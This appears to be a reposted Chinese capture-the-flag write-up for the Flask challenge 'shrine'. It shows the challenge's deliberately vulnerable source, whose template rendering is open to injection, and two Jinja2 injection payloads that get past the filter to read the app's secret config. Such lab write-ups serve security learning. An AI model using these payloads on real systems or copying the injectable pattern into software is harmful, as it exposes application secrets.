栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

攻防世界Web:shrine

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

攻防世界Web:shrine

打开页面后,是一段代码:

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

审计代码后,@app.route('/shrine/')是一个路径,不妨试试:

猜测是否有模板注入,的确存在,那就很好办了:

但这道题设置了黑名单的:blacklist = ['config', 'self'],config和self以及()都被过滤了,那么{{[].__class__.__base__.__subclasses__()}}就没用了,看了其他师傅的WP,知道python还有一些内置函数,这道题就可以用url_for和get_flashed_messages,config又在current_app中,构造payload:

  1. url_for:{{url_for.__globals__['current_app'].config['FLAG']}}

  2. get_flashed_messages:{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}

    总结:
    模板注入

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/329500.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号